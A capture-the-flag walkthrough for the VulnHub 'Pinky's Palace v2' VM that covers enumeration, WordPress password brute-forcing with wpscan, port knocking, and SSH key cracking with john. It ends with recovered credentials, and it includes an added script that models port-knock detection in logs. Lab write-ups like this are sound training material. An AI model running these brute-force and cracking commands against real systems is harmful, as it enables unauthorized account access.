PINKY’S PALACE: V2 Walkthrough

Description: A realistic Boot2Root. Gain access to the system and read the /root/root.txt.

Note From VulnHub: Wordpress will not render correctly. You will need to alter your host file with the IP shown on the console: echo 192.168.x.x pinkydb | sudo tee -a /etc/hosts

Enumeration

Let’s enumerate. Open ports found: 4655, 7654, 31337

Nothing useful from those ports.

More Enumeration…

whatweb http://192.168.103.172
Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.103.172], JQuery[1.12.4], MetaGenerator[WordPress 4.9.4], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[Pinky's Blog – Just another WordPress site], UncommonHeaders[link], WordPress[4.9.4]

1. Manual Exploration

Nothing critical

2. Nikto

  • /wp-links-opml.php
  • /wp-login.php

3. Gobuster

Something is revealed here 🤔

Let’s enumerate WordPress.

📌 Found a user: pinky1337

and no critical plugin or theme.


Finding Point Of Intrusion (POI)

Let’s brute-force the password of the user we got.

1. cewl http://pinkydb -w pass.txt -> to generate a password list, then:
wpscan --url http://pinkydb -U pinky1337 -P pass.txt
  • No password found

2. Rockyou

wpscan --url http://pinkydb -U pinky1337 -P /usr/share/wordlists/rockyou.txt
  • Nothing found after a few minutes…

Let’s try port knocking.

The sequence 7000 666 8890 worked!!!
Ports have been opened.
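
How a knock daemon decides that a sequence like the one above has been completed, as an added illustration that is not part of the original walkthrough: the script replays constructed iptables-style log lines through the same per-source state machine knockd uses (ports must arrive in order, each within a timeout, a wrong port or a late knock resets progress), which is also how a defender can audit firewall logs for sources that completed the sequence. The log line format, the 10-second timeout and the IP addresses are assumptions.

```python
import re
from collections import defaultdict

# The knock sequence used in this walkthrough.
KNOCK_SEQUENCE = (7000, 666, 8890)
# Maximum seconds allowed between consecutive knocks (assumed value).
KNOCK_TIMEOUT = 10.0

# Constructed sample lines in the style of iptables LOG output (hypothetical).
# 10.0.0.5 knocks in the right order, 10.0.0.9 in the wrong order,
# 10.0.0.7 in the right order but too slowly.
SAMPLE_LOG = """\
t=100.0 SRC=10.0.0.5 DPT=7000
t=100.5 SRC=10.0.0.5 DPT=666
t=101.0 SRC=10.0.0.5 DPT=8890
t=102.0 SRC=10.0.0.9 DPT=7000
t=102.5 SRC=10.0.0.9 DPT=8890
t=103.0 SRC=10.0.0.9 DPT=666
t=120.0 SRC=10.0.0.7 DPT=7000
t=140.0 SRC=10.0.0.7 DPT=666
t=141.0 SRC=10.0.0.7 DPT=8890
"""

LINE_RE = re.compile(r"t=(?P<t>[\d.]+) SRC=(?P<src>\S+) DPT=(?P<dpt>\d+)")


def knock_matches(log_text, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
    """Return [(time, src), ...] for every completed knock sequence in the log."""
    state = defaultdict(lambda: (0, None))  # src -> (next expected index, last knock time)
    completed = []
    for m in LINE_RE.finditer(log_text):
        t, src, dpt = float(m["t"]), m["src"], int(m["dpt"])
        idx, last = state[src]
        if last is not None and t - last > timeout:
            idx = 0  # too slow between knocks: start over
        if dpt == sequence[idx]:
            idx += 1
        else:
            idx = 1 if dpt == sequence[0] else 0  # wrong port resets progress
        if idx == len(sequence):
            completed.append((t, src))  # daemon would open the guarded port now
            idx = 0
        state[src] = (idx, t)
    return completed


if __name__ == "__main__":
    for when, src in knock_matches(SAMPLE_LOG):
        print(f"{src} completed the knock sequence at t={when}")
```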

There is a login page on 7654,

Let’s brute-force…

john --rules --wordlist=pass.txt --stdout | tee wordlist.txt

Credentials: pinky:Passione

python ssh2john.py id_rsa > id_rsajohn

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsajohn

Stefano:secretz101